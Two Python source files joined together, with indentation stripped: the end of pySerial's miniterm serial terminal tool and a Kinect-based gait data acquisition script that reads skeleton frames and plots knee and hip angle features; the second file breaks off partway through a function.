new_filters = sys.stdin.readline().lower().split()
if new_filters:
for f in new_filters:
if f not in TRANSFORMATIONS:
sys.stderr.write('--- unknown filter: {!r}\n'.format(f))
break
else:
self.filters = new_filters
self.update_transformations()
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def change_encoding(self):
"""change encoding on the serial port"""
sys.stderr.write('\n--- Enter new encoding name [{}]: '.format(self.input_encoding))
with self.console:
new_encoding = sys.stdin.readline().strip()
if new_encoding:
try:
codecs.lookup(new_encoding)
except LookupError:
sys.stderr.write('--- invalid encoding name: {}\n'.format(new_encoding))
else:
self.set_rx_encoding(new_encoding)
self.set_tx_encoding(new_encoding)
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
def change_baudrate(self):
"""change the baudrate"""
sys.stderr.write('\n--- Baudrate: ')
sys.stderr.flush()
with self.console:
backup = self.serial.baudrate
try:
self.serial.baudrate = int(sys.stdin.readline().strip())
except ValueError as e:
sys.stderr.write('--- ERROR setting baudrate: {} ---\n'.format(e))
self.serial.baudrate = backup
else:
self.dump_port_settings()
def change_port(self):
"""Have a conversation with the user to change the serial port"""
with self.console:
try:
port = ask_for_port()
except KeyboardInterrupt:
port = None
if port and port != self.serial.port:
# reader thread needs to be shut down
self._stop_reader()
# save settings
settings = self.serial.getSettingsDict()
try:
new_serial = serial.serial_for_url(port, do_not_open=True)
# restore settings and open
new_serial.applySettingsDict(settings)
new_serial.rts = self.serial.rts
new_serial.dtr = self.serial.dtr
new_serial.open()
new_serial.break_condition = self.serial.break_condition
except Exception as e:
sys.stderr.write('--- ERROR opening new port: {} ---\n'.format(e))
if 'new_serial' in locals():
new_serial.close()  # only close if serial_for_url succeeded
else:
self.serial.close()
self.serial = new_serial
sys.stderr.write('--- Port changed to: {} ---\n'.format(self.serial.port))
# and restart the reader thread
self._start_reader()
def suspend_port(self):
"""\
open port temporarily, allow reconnect, exit and port change to get
out of the loop
"""
# reader thread needs to be shut down
self._stop_reader()
self.serial.close()
sys.stderr.write('\n--- Port closed: {} ---\n'.format(self.serial.port))
do_change_port = False
while not self.serial.is_open:
sys.stderr.write('--- Quit: {exit} | p: port change | any other key to reconnect ---\n'.format(
exit=key_description(self.exit_character)))
k = self.console.getkey()
if k == self.exit_character:
self.stop() # exit app
break
elif k in 'pP':
do_change_port = True
break
try:
self.serial.open()
except Exception as e:
sys.stderr.write('--- ERROR opening port: {} ---\n'.format(e))
if do_change_port:
self.change_port()
else:
# and restart the reader thread
self._start_reader()
sys.stderr.write('--- Port opened: {} ---\n'.format(self.serial.port))
def get_help_text(self):
"""return the help text"""
# help text, starts with blank line!
return """
--- pySerial ({version}) - miniterm - help
---
--- {exit:8} Exit program (alias {menu} Q)
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
--- {menu:7} Send the menu character itself to remote
--- {exit:7} Send the exit character itself to remote
--- {info:7} Show info
--- {upload:7} Upload file (prompt will be shown)
--- {repr:7} encoding
--- {filter:7} edit filters
--- Toggles:
--- {rts:7} RTS {dtr:7} DTR {brk:7} BREAK
--- {echo:7} echo {eol:7} EOL
---
--- Port settings ({menu} followed by the following):
--- p change port
--- 7 8 set data bits
--- N E O S M change parity (None, Even, Odd, Space, Mark)
--- 1 2 3 set stop bits (1, 2, 1.5)
--- b change baud rate
--- x X disable/enable software flow control
--- r R disable/enable hardware flow control
""".format(version=getattr(serial, 'VERSION', 'unknown version'),
exit=key_description(self.exit_character),
menu=key_description(self.menu_character),
rts=key_description('\x12'),
dtr=key_description('\x04'),
brk=key_description('\x02'),
echo=key_description('\x05'),
info=key_description('\x09'),
upload=key_description('\x15'),
repr=key_description('\x01'),
filter=key_description('\x06'),
eol=key_description('\x0c'))
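# --- embedding sketch (editor's addition, illustrative only) ---
# Miniterm can be driven without the argparse front-end in main(); the
# 'loop://' URL below is pySerial's built-in loopback port:
#
#   ser = serial.serial_for_url('loop://', baudrate=115200, timeout=1)
#   term = Miniterm(ser, echo=True, eol='lf', filters=['default'])
#   term.set_rx_encoding('UTF-8')
#   term.set_tx_encoding('UTF-8')
#   term.start()
#   term.join(True)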
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# default args can be used to override when calling main() from another script
# e.g. to create a miniterm-my-device.py
def main(default_port=None, default_baudrate=9600, default_rts=None, default_dtr=None):
"""Command line tool, entry point"""
import argparse
parser = argparse.ArgumentParser(
description='Miniterm - A simple terminal program for the serial port.')
parser.add_argument(
'port',
nargs='?',
help='serial port name ("-" to show port list)',
default=default_port)
parser.add_argument(
'baudrate',
nargs='?',
type=int,
help='set baud rate, default: %(default)s',
default=default_baudrate)
group = parser.add_argument_group('port settings')
group.add_argument(
'--parity',
choices=['N', 'E', 'O', 'S', 'M'],
type=lambda c: c.upper(),
help='set parity, one of {N E O S M}, default: N',
default='N')
group.add_argument(
'--rtscts',
action='store_true',
help='enable RTS/CTS flow control (default off)',
default=False)
group.add_argument(
'--xonxoff',
action='store_true',
help='enable software flow control (default off)',
default=False)
group.add_argument(
'--rts',
type=int,
help='set initial RTS line state (possible values: 0, 1)',
default=default_rts)
group.add_argument(
'--dtr',
type=int,
help='set initial DTR line state (possible values: 0, 1)',
default=default_dtr)
group.add_argument(
'--non-exclusive',
dest='exclusive',
action='store_false',
help='disable locking for native ports',
default=True)
group.add_argument(
'--ask',
action='store_true',
help='ask again for port when open fails',
default=False)
group = parser.add_argument_group('data handling')
group.add_argument(
'-e', '--echo',
action='store_true',
help='enable local echo (default off)',
default=False)
group.add_argument(
'--encoding',
dest='serial_port_encoding',
metavar='CODEC',
help='set the encoding for the serial port (e.g. hexlify, Latin1, UTF-8), default: %(default)s',
default='UTF-8')
group.add_argument(
'-f', '--filter',
action='append',
metavar='NAME',
help='add text transformation',
default=[])
group.add_argument(
'--eol',
choices=['CR', 'LF', 'CRLF'],
type=lambda c: c.upper(),
help='end of line mode',
default='CRLF')
group.add_argument(
'--raw',
action='store_true',
help='do not apply any encodings/transformations',
default=False)
group = parser.add_argument_group('hotkeys')
group.add_argument(
'--exit-char',
type=int,
metavar='NUM',
help='Unicode of special character that is used to exit the application, default: %(default)s',
default=0x1d) # GS/CTRL+]
group.add_argument(
'--menu-char',
type=int,
metavar='NUM',
help='Unicode code of special character that is used to control miniterm (menu), default: %(default)s',
default=0x14) # Menu: CTRL+T
group = parser.add_argument_group('diagnostics')
group.add_argument(
'-q', '--quiet',
action='store_true',
help='suppress non-error messages',
default=False)
group.add_argument(
'--develop',
action='store_true',
help='show Python traceback on error',
default=False)
args = parser.parse_args()
if args.menu_char == args.exit_char:
parser.error('--exit-char can not be the same as --menu-char')
if args.filter:
if 'help' in args.filter:
sys.stderr.write('Available filters:\n')
sys.stderr.write('\n'.join(
'{:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n')
sys.exit(1)
filters = args.filter
else:
filters = ['default']
while True:
# no port given on command line -> ask user now
if args.port is None or args.port == '-':
try:
args.port = ask_for_port()
except KeyboardInterrupt:
sys.stderr.write('\n')
parser.error('user aborted and port is not given')
else:
if not args.port:
parser.error('port is not given')
try:
serial_instance = serial.serial_for_url(
args.port,
args.baudrate,
parity=args.parity,
rtscts=args.rtscts,
xonxoff=args.xonxoff,
do_not_open=True)
if not hasattr(serial_instance, 'cancel_read'):
# enable timeout for alive flag polling if cancel_read is not available
serial_instance.timeout = 1
if args.dtr is not None:
if not args.quiet:
sys.stderr.write('--- forcing DTR {}\n'.format('active' if args.dtr else 'inactive'))
serial_instance.dtr = args.dtr
if args.rts is not None:
if not args.quiet:
sys.stderr.write('--- forcing RTS {}\n'.format('active' if args.rts else 'inactive'))
serial_instance.rts = args.rts
if isinstance(serial_instance, serial.Serial):
serial_instance.exclusive = args.exclusive
serial_instance.open()
except serial.SerialException as e:
sys.stderr.write('could not open port {!r}: {}\n'.format(args.port, e))
if args.develop:
raise
if not args.ask:
sys.exit(1)
else:
args.port = '-'
else:
break
miniterm = Miniterm(
serial_instance,
echo=args.echo,
eol=args.eol.lower(),
filters=filters)
miniterm.exit_character = unichr(args.exit_char)
miniterm.menu_character = unichr(args.menu_char)
miniterm.raw = args.raw
miniterm.set_rx_encoding(args.serial_port_encoding)
miniterm.set_tx_encoding(args.serial_port_encoding)
if not args.quiet:
sys.stderr.write('--- Miniterm on {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits} ---\n'.format(
p=miniterm.serial))
sys.stderr.write('--- Quit: {} | Menu: {} | Help: {} followed by {} ---\n'.format(
key_description(miniterm.exit_character),
key_description(miniterm.menu_character),
key_description(miniterm.menu_character),
key_description('\x08')))
miniterm.start()
try:
miniterm.join(True)
except KeyboardInterrupt:
pass
if not args.quiet:
sys.stderr.write('\n--- exit ---\n')
miniterm.join()
miniterm.close()
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
if __name__ == '__main__':
main()
|
Kinect-based_gait_data_acquisition_system.py
|
'''The MIT License (MIT)
Copyright (c) Microsoft
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.'''
from pykinect2 import PyKinectV2
from pykinect2.PyKinectV2 import *
import ctypes
import _ctypes
import pygame
import sys
import numpy
if sys.hexversion >= 0x03000000:
import _thread as thread
else:
import thread
from pygame.locals import *
from pgu import gui
import time, sched
import threading
from socket import *
from datetime import datetime
import cv2
import heapq
from collections import namedtuple
from time import monotonic as _time
import openpyxl
from openpyxl import load_workbook
from openpyxl import Workbook
import numpy as np
from matplotlib import pyplot as plt
import pymysql
KINECT_MAX_BODY_COUNT = 6
class PyKinectRuntime(object):
"""manages Kinect objects and simplifying access to them"""
def __init__(self, frame_source_types):
# recipe to get address of surface: http://archives.seul.org/pygame/users/Apr-2008/msg00218.html
is_64bits = sys.maxsize > 2**32
if not is_64bits:
self.Py_ssize_t = ctypes.c_int
else:
self.Py_ssize_t = ctypes.c_int64
self._PyObject_AsWriteBuffer = ctypes.pythonapi.PyObject_AsWriteBuffer
self._PyObject_AsWriteBuffer.restype = ctypes.c_int
self._PyObject_AsWriteBuffer.argtypes = [ctypes.py_object,
ctypes.POINTER(ctypes.c_void_p),
ctypes.POINTER(self.Py_ssize_t)]
#self._color_frame_ready = PyKinectV2._event()
#self._depth_frame_ready = PyKinectV2._event()
#self._body_frame_ready = PyKinectV2._event()
#self._body_index_frame_ready = PyKinectV2._event()
#self._infrared_frame_ready = PyKinectV2._event()
#self._long_exposure_infrared_frame_ready = PyKinectV2._event()
#self._audio_frame_ready = PyKinectV2._event()
self._close_event = ctypes.windll.kernel32.CreateEventW(None, False, False, None)
self._color_frame_arrived_event = 0
self._depth_frame_arrived_event = 0
self._body_frame_arrived_event = 0
self._body_index_frame_arrived_event = 0
self._infrared_frame_arrived_event = 0
self._long_exposure_infrared_frame_arrived_event = 0
self._audio_frame_arrived_event = 0
self._color_frame_lock = thread.allocate()
self._depth_frame_lock = thread.allocate()
self._body_frame_lock = thread.allocate()
self._body_index_frame_lock = thread.allocate()
self._infrared_frame_lock = thread.allocate()
self._long_exposure_infrared_frame_lock = thread.allocate()
self._audio_frame_lock = thread.allocate()
#initialize sensor
self._sensor = ctypes.POINTER(PyKinectV2.IKinectSensor)()
hres = ctypes.windll.kinect20.GetDefaultKinectSensor(ctypes.byref(self._sensor))
hres = self._sensor.Open()
self._mapper = self._sensor.CoordinateMapper
self.frame_source_types = frame_source_types
self.max_body_count = KINECT_MAX_BODY_COUNT
self._handles = (ctypes.c_voidp * 8)()
self._handles[0] = self._close_event
self._handles[1] = self._close_event
self._handles[2] = self._close_event
self._handles[3] = self._close_event
self._handles[4] = self._close_event
self._handles[5] = self._close_event
self._handles[6] = self._close_event
self._handles[7] = self._close_event
self._waitHandleCount = 1
self._color_source = self._sensor.ColorFrameSource
self.color_frame_desc = self._color_source.FrameDescription
self._infrared_source = self._sensor.InfraredFrameSource
self.infrared_frame_desc = self._infrared_source.FrameDescription
self._depth_source = self._sensor.DepthFrameSource
self.depth_frame_desc = self._depth_source.FrameDescription
self._body_index_source = self._sensor.BodyIndexFrameSource
self.body_index_frame_desc = self._body_index_source.FrameDescription
self._body_source = self._sensor.BodyFrameSource
self._body_frame_data = ctypes.POINTER(ctypes.POINTER(IBody))
self.max_body_count = self._body_source.BodyCount
self._color_frame_data = None
self._depth_frame_data = None
self._body_frame_data = None
self._body_index_frame_data = None
self._infrared_frame_data = None
self._long_exposure_infrared_frame_data = None
self._audio_frame_data = None
if(self.frame_source_types & FrameSourceTypes_Color):
self._color_frame_data = ctypes.POINTER(ctypes.c_ubyte)
self._color_frame_data_capacity = ctypes.c_uint(self.color_frame_desc.Width * self.color_frame_desc.Height * 4)
self._color_frame_data_type = ctypes.c_ubyte * self._color_frame_data_capacity.value
self._color_frame_data = ctypes.cast(self._color_frame_data_type(), ctypes.POINTER(ctypes.c_ubyte))
self._color_frame_reader = self._color_source.OpenReader()
self._color_frame_arrived_event = self._color_frame_reader.SubscribeFrameArrived()
self._handles[self._waitHandleCount] = self._color_frame_arrived_event
self._waitHandleCount += 1
if(self.frame_source_types & FrameSourceTypes_Infrared):
self._infrared_frame_data = ctypes.POINTER(ctypes.c_ushort)
self._infrared_frame_data_capacity = ctypes.c_uint(self.infrared_frame_desc.Width * self.infrared_frame_desc.Height)
self._infrared_frame_data_type = ctypes.c_ushort * self._infrared_frame_data_capacity.value
self._infrared_frame_data = ctypes.cast(self._infrared_frame_data_type(), ctypes.POINTER(ctypes.c_ushort))
self._infrared_frame_reader = self._infrared_source.OpenReader()
self._infrared_frame_arrived_event = self._infrared_frame_reader.SubscribeFrameArrived()
self._handles[self._waitHandleCount] = self._infrared_frame_arrived_event
self._waitHandleCount += 1
if(self.frame_source_types & FrameSourceTypes_Depth):
self._depth_frame_data = ctypes.POINTER(ctypes.c_ushort)
self._depth_frame_data_capacity = ctypes.c_uint(self.depth_frame_desc.Width * self.depth_frame_desc.Height)
self._depth_frame_data_type = ctypes.c_ushort * self._depth_frame_data_capacity.value
self._depth_frame_data = ctypes.cast(self._depth_frame_data_type(), ctypes.POINTER(ctypes.c_ushort))
self._depth_frame_reader = self._depth_source.OpenReader()
self._depth_frame_arrived_event = self._depth_frame_reader.SubscribeFrameArrived()
self._handles[self._waitHandleCount] = self._depth_frame_arrived_event
self._waitHandleCount += 1
if(self.frame_source_types & FrameSourceTypes_BodyIndex):
self._body_index_frame_data = ctypes.POINTER(ctypes.c_ubyte)
self._body_index_frame_data_capacity = ctypes.c_uint(self.body_index_frame_desc.Width * self.body_index_frame_desc.Height)
self._body_index_frame_data_type = ctypes.c_ubyte * self._body_index_frame_data_capacity.value
self._body_index_frame_data = ctypes.cast(self._body_index_frame_data_type(), ctypes.POINTER(ctypes.c_ubyte))
self._body_index_frame_reader = self._body_index_source.OpenReader()
self._body_index_frame_arrived_event = self._body_index_frame_reader.SubscribeFrameArrived()
self._handles[self._waitHandleCount] = self._body_index_frame_arrived_event
self._waitHandleCount += 1
self._body_frame_data = None
if(self.frame_source_types & FrameSourceTypes_Body):
self._body_frame_data_capacity = ctypes.c_uint(self.max_body_count)
self._body_frame_data_type = ctypes.POINTER(IBody) * self._body_frame_data_capacity.value
self._body_frame_data = ctypes.cast(self._body_frame_data_type(), ctypes.POINTER(ctypes.POINTER(IBody)))
self._body_frame_reader = self._body_source.OpenReader()
self._body_frame_arrived_event = self._body_frame_reader.SubscribeFrameArrived()
self._body_frame_bodies = None
self._handles[self._waitHandleCount] = self._body_frame_arrived_event
self._waitHandleCount += 1
thread.start_new_thread(self.kinect_frame_thread, ())
self._last_color_frame = None
self._last_depth_frame = None
self._last_body_frame = None
self._last_body_index_frame = None
self._last_infrared_frame = None
self._last_long_exposure_infrared_frame = None
self._last_audio_frame = None
start_clock = time.process_time()
self._last_color_frame_access = self._last_color_frame_time = start_clock
self._last_body_frame_access = self._last_body_frame_time = start_clock
self._last_body_index_frame_access = self._last_body_index_frame_time = start_clock
self._last_depth_frame_access = self._last_depth_frame_time = start_clock
self._last_infrared_frame_access = self._last_infrared_frame_time = start_clock
self._last_long_exposure_infrared_frame_access = self._last_long_exposure_infrared_frame_time = start_clock
self._last_audio_frame_access = self._last_audio_frame_time = start_clock
def close(self):
if self._sensor is not None:
ctypes.windll.kernel32.SetEvent(self._close_event)
ctypes.windll.kernel32.CloseHandle(self._close_event)
self._color_frame_reader = None
self._depth_frame_reader = None
self._body_index_frame_reader = None
self._body_frame_reader = None
self._color_source = None
self._depth_source = None
self._body_index_source = None
self._body_source = None
self._body_frame_data = None
self._sensor.Close()
self._sensor = None
def __del__(self):
self.close()
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
def surface_as_array(self, surface_buffer_interface):
address = ctypes.c_void_p()
size = self.Py_ssize_t()
self._PyObject_AsWriteBuffer(surface_buffer_interface,
ctypes.byref(address), ctypes.byref(size))
bytes = (ctypes.c_byte * size.value).from_address(address.value)
bytes.object = surface_buffer_interface
return bytes
def has_new_color_frame(self):
has = (self._last_color_frame_time > self._last_color_frame_access)
return has
def has_new_depth_frame(self):
has = (self._last_depth_frame_time > self._last_depth_frame_access)
return has
def has_new_body_frame(self):
has = (self._last_body_frame_time > self._last_body_frame_access)
return has
def has_new_body_index_frame(self):
has = (self._last_body_index_frame_time > self._last_body_index_frame_access)
return has
def has_new_infrared_frame(self):
has = (self._last_infrared_frame_time > self._last_infrared_frame_access)
return has
def has_new_long_exposure_infrared_frame(self):
has = (self._last_long_exposure_infrared_frame_time > self._last_long_exposure_infrared_frame_access)
return has
def has_new_audio_frame(self):
has = (self._last_audio_frame_time > self._last_audio_frame_access)
return has
def get_last_color_frame(self):
with self._color_frame_lock:
if self._color_frame_data is not None:
data = numpy.copy(numpy.ctypeslib.as_array(self._color_frame_data, shape=(self._color_frame_data_capacity.value,)))
self._last_color_frame_access = time.process_time()
return data
else:
return None
def get_last_infrared_frame(self):
with self._infrared_frame_lock:
if self._infrared_frame_data is not None:
data = numpy.copy(numpy.ctypeslib.as_array(self._infrared_frame_data, shape=(self._infrared_frame_data_capacity.value,)))
self._last_infrared_frame_access = time.process_time()
return data
else:
return None
def get_last_depth_frame(self):
with self._depth_frame_lock:
if self._depth_frame_data is not None:
data = numpy.copy(numpy.ctypeslib.as_array(self._depth_frame_data, shape=(self._depth_frame_data_capacity.value,)))
self._last_depth_frame_access = time.process_time()
return data
else:
return None
def get_last_body_index_frame(self):
with self._body_index_frame_lock:
if self._body_index_frame_data is not None:
data = numpy.copy(numpy.ctypeslib.as_array(self._body_index_frame_data, shape=(self._body_index_frame_data_capacity.value,)))
self._last_body_index_frame_access = time.process_time()
return data
else:
return None
def get_last_body_frame(self):
with self._body_frame_lock:
if self._body_frame_bodies is not None:
self._last_body_frame_access = time.process_time()
return self._body_frame_bodies.copy()
else:
return None
def body_joint_to_color_space(self, joint):
return self._mapper.MapCameraPointToColorSpace(joint.Position)
def body_joint_to_depth_space(self, joint):
return self._mapper.MapCameraPointToDepthSpace(joint.Position)
def body_joints_to_color_space(self, joints):
joint_points = numpy.ndarray((PyKinectV2.JointType_Count), dtype=object)  # numpy.object was removed in NumPy 1.24
for j in range(0, PyKinectV2.JointType_Count):
joint_points[j] = self.body_joint_to_color_space(joints[j])
return joint_points
def body_joints_to_depth_space(self, joints):
joint_points = numpy.ndarray((PyKinectV2.JointType_Count), dtype=object)
for j in range(0, PyKinectV2.JointType_Count):
joint_points[j] = self.body_joint_to_depth_space(joints[j])
return joint_points
def kinect_frame_thread(self):
while 1:
wait = ctypes.windll.kernel32.WaitForMultipleObjects(self._waitHandleCount, self._handles, False, PyKinectV2._INFINITE)
if wait == 0:
break
if self._handles[wait] == self._color_frame_arrived_event:
self.handle_color_arrived(wait)
elif self._handles[wait] == self._depth_frame_arrived_event:
self.handle_depth_arrived(wait)
elif self._handles[wait] == self._body_frame_arrived_event:
self.handle_body_arrived(wait)
elif self._handles[wait] == self._body_index_frame_arrived_event:
self.handle_body_index_arrived(wait)
elif self._handles[wait] == self._infrared_frame_arrived_event:
self.handle_infrared_arrived(wait)
elif self._handles[wait] == self._long_exposure_infrared_frame_arrived_event:
self.handle_long_exposure_infrared_arrived(wait)
elif self._handles[wait] == self._audio_frame_arrived_event:
self.handle_audio_arrived(wait)
else:
break
def handle_color_arrived(self, handle_index):
colorFrameEventData = self._color_frame_reader.GetFrameArrivedEventData(self._handles[handle_index])
colorFrameRef = colorFrameEventData.FrameReference
try:
colorFrame = colorFrameRef.AcquireFrame()
try:
with self._color_frame_lock:
colorFrame.CopyConvertedFrameDataToArray(self._color_frame_data_capacity, self._color_frame_data, PyKinectV2.ColorImageFormat_Bgra)
self._last_color_frame_time = time.process_time()
except:
pass
colorFrame = None
except:
pass
colorFrameRef = None
colorFrameEventData = None
def handle_depth_arrived(self, handle_index):
depthFrameEventData = self._depth_frame_reader.GetFrameArrivedEventData(self._handles[handle_index])
depthFrameRef = depthFrameEventData.FrameReference
try:
depthFrame = depthFrameRef.AcquireFrame()
try:
with self._depth_frame_lock:
depthFrame.CopyFrameDataToArray(self._depth_frame_data_capacity, self._depth_frame_data)
self._last_depth_frame_time = time.process_time()
except:
pass
depthFrame = None
except:
pass
depthFrameRef = None
depthFrameEventData = None
def handle_body_arrived(self, handle_index):
bodyFrameEventData = self._body_frame_reader.GetFrameArrivedEventData(self._handles[handle_index])
bodyFrameRef = bodyFrameEventData.FrameReference
try:
bodyFrame = bodyFrameRef.AcquireFrame()
try:
with self._body_frame_lock:
bodyFrame.GetAndRefreshBodyData(self._body_frame_data_capacity, self._body_frame_data)
self._body_frame_bodies = KinectBodyFrameData(bodyFrame, self._body_frame_data, self.max_body_count)
self._last_body_frame_time = time.process_time()
# need these 2 lines as a workaround for handling IBody referencing exception
self._body_frame_data = None
self._body_frame_data = ctypes.cast(self._body_frame_data_type(), ctypes.POINTER(ctypes.POINTER(IBody)))
except:
pass
bodyFrame = None
except:
pass
bodyFrameRef = None
bodyFrameEventData = None
def handle_body_index_arrived(self, handle_index):
bodyIndexFrameEventData = self._body_index_frame_reader.GetFrameArrivedEventData(self._handles[handle_index])
bodyIndexFrameRef = bodyIndexFrameEventData.FrameReference
try:
bodyIndexFrame = bodyIndexFrameRef.AcquireFrame()
try:
with self._body_index_frame_lock:
bodyIndexFrame.CopyFrameDataToArray(self._body_index_frame_data_capacity, self._body_index_frame_data)
self._last_body_index_frame_time = time.process_time()
except:
pass
bodyIndexFrame = None
except:
pass
bodyIndexFrameRef = None
bodyIndexFrameEventData = None
def handle_infrared_arrived(self, handle_index):
infraredFrameEventData = self._infrared_frame_reader.GetFrameArrivedEventData(self._handles[handle_index])
infraredFrameRef = infraredFrameEventData.FrameReference
try:
infraredFrame = infraredFrameRef.AcquireFrame()
try:
with self._infrared_frame_lock:
infraredFrame.CopyFrameDataToArray(self._infrared_frame_data_capacity, self._infrared_frame_data)
self._last_infrared_frame_time = time.process_time()
except:
pass
infraredFrame = None
except:
pass
infraredFrameRef = None
infraredFrameEventData = None
def handle_long_exposure_infrared_arrived(self, handle_index):
pass
def handle_audio_arrived(self, handle_index):
pass
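# --- usage sketch (editor's addition, illustrative only) ---
# Typical polling loop against the runtime defined above:
#
#   kinect = PyKinectRuntime(PyKinectV2.FrameSourceTypes_Color |
#                            PyKinectV2.FrameSourceTypes_Body)
#   while True:
#       if kinect.has_new_body_frame():
#           bodies = kinect.get_last_body_frame()
#           # bodies.bodies[i].joints holds PyKinectV2._Joint entries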
class KinectBody(object):
def __init__(self, body = None):
self.is_restricted = False
self.tracking_id = -1
self.is_tracked = False
if body is not None:
self.is_tracked = body.IsTracked
if self.is_tracked:
self.is_restricted = body.IsRestricted
self.tracking_id = body.TrackingId
self.engaged = body.Engaged
self.lean = body.Lean
self.lean_tracking_state = body.LeanTrackingState
self.hand_left_state = body.HandLeftState
self.hand_left_confidence = body.HandLeftConfidence
self.hand_right_state = body.HandRightState
self.hand_right_confidence = body.HandRightConfidence
self.clipped_edges = body.ClippedEdges
joints = ctypes.POINTER(PyKinectV2._Joint)
joints_capacity = ctypes.c_uint(PyKinectV2.JointType_Count)
joints_data_type = PyKinectV2._Joint * joints_capacity.value
joints = ctypes.cast(joints_data_type(), ctypes.POINTER(PyKinectV2._Joint))
body.GetJoints(PyKinectV2.JointType_Count, joints)
self.joints = joints
joint_orientations = ctypes.POINTER(PyKinectV2._JointOrientation)
joint_orientations_data_type = PyKinectV2._JointOrientation * joints_capacity.value
joint_orientations = ctypes.cast(joint_orientations_data_type(), ctypes.POINTER(PyKinectV2._JointOrientation))
body.GetJointOrientations(PyKinectV2.JointType_Count, joint_orientations)
self.joint_orientations = joint_orientations
class KinectBodyFrameData(object):
def __init__(self, bodyFrame, body_frame_data, max_body_count):
self.bodies = None
self.floor_clip_plane = None
if bodyFrame is not None:
self.floor_clip_plane = bodyFrame.FloorClipPlane
self.relative_time = bodyFrame.RelativeTime
self.bodies = numpy.ndarray((max_body_count), dtype=object)
for i in range(0, max_body_count):
self.bodies[i] = KinectBody(body_frame_data[i])
def copy(self):
res = KinectBodyFrameData(None, None, 0)
res.floor_clip_plane = self.floor_clip_plane
res.relative_time = self.relative_time
res.bodies = numpy.copy(self.bodies)
return res
# colors for drawing different bodies
SKELETON_COLORS = [pygame.color.THECOLORS["red"],
pygame.color.THECOLORS["blue"],
pygame.color.THECOLORS["green"],
pygame.color.THECOLORS["orange"],
pygame.color.THECOLORS["purple"],
pygame.color.THECOLORS["yellow"],
pygame.color.THECOLORS["violet"]]
class TimesUpDialog(gui.Dialog):
def __init__(self,**params):
title = gui.Label("massagebox")
width = 400
height = 50
doc = gui.Document(width=width)
space = title.style.font.size(" ")
doc.block(align=0)
for word in """TimeIsUp_RecordingFinished""".split(" "):
doc.add(gui.Label(word))
doc.space(space)
doc.br(space[1])
gui.Dialog.__init__(self,title,gui.ScrollArea(doc,width,height))
class MassageBox(gui.Dialog):
msg = ''
def __init__(self,**params):
title = gui.Label("massagebox")
width = 400
height = 50
table = gui.Table(width=width)
message = gui.Label(self.msg)
table.add(message)
gui.Dialog.__init__(self,title,gui.ScrollArea(table,width,height))
class DrawGraphDialog(gui.Dialog):
def __init__(self,**params):
title = gui.Label("Draw Graph")
self.t= gui.Table(width=600, height=300)
td_style = {'padding_right': 10}
self.t.tr()
self.t.td( gui.Label('File Name:') , style=td_style, row=0 )
self.input_file = gui.Input(size=40)
self.t.td( self.input_file, style=td_style, colspan=1, )
b = gui.Button("Browse...")
self.t.td( b, style=td_style, colspan=1 )
b.connect(gui.CLICK, self.open_file_browser, None)
self.t.tr()
b = gui.Button("Draw Left Graph")
self.t.td( b, style=td_style, colspan=2)
b.connect(gui.CLICK, self.left_data_process)
b = gui.Button("Draw Right Graph")
self.t.td( b, style=td_style, colspan=2)
b.connect(gui.CLICK, self.right_data_process)
gui.Dialog.__init__(self,title,self.t)
def open_file_browser(self, arg):
d = gui.FileDialog()
d.connect(gui.CHANGE, self.handle_file_browser_closed, d)
d.open()
def handle_file_browser_closed(self, dlg):
if dlg.value: self.input_file.value = dlg.value.split('\\')[-1]
def meanfilter(self, flux, w):
length = len(flux)
flux_out = np.zeros((length, 1))
for i in range(length):
if i >= w and i < length - w:
flux_out[i] = np.mean(flux[i-w:i+w])
else:
flux_out[i] = flux[i]
return flux_out
def right_data_process(self):
filename = self.input_file.value
print(filename)
data = np.loadtxt(filename)
roworg, colorg = data.shape
lastTF = 10
firstTF = 10
roworg = roworg - lastTF - firstTF
dataorg = np.zeros((roworg,colorg))
for i in range(roworg):
for j in range(colorg):
dataorg[i][j] = data[i+firstTF,j]
print('test')
for i in range(75):
colmean = self.meanfilter(dataorg[:, i], 2)
for row in range(roworg):
dataorg[row, i] = colmean[row][0]
pointNumi = 17  # KneeRight
pointNumj = 16  # HipRight
pointNumk = 18  # AnkleRight
# KneeLeftX = zeros(1,roworg);
# KneeLeftY = zeros(1,roworg);
TimeF = np.zeros((1,roworg));
# for rownow in range(roworg):
# KneeLeftX(1,rownow) = dataorg[rownow,3*(pointNumj + 1)-2];
# KneeLeftY(1,rownow) = dataorg[rownow,3*(pointNumj + 1)-1];
# TimeF(1,rownow) = rownow;
FeatureOutknee = np.zeros((roworg,2));
for rownow in range(roworg):
FeatureOutknee[rownow,0] = (dataorg[rownow,3*pointNumi]-dataorg[rownow,3*pointNumj])/(dataorg[rownow,3*pointNumi +1] - dataorg[rownow,3*pointNumj+1]);#kneeleft hipleft angle
FeatureOutknee[rownow,1] = (dataorg[rownow,3*pointNumi]-dataorg[rownow,3*pointNumk])/(dataorg[rownow,3*pointNumi +1] - dataorg[rownow,3*pointNumk+1]);#kneeleft hipleft angle
TimeF[0,rownow] = rownow;
for i in range(2):
colmean = self.meanfilter(FeatureOutknee[:, i], 2)
for row in range(roworg):
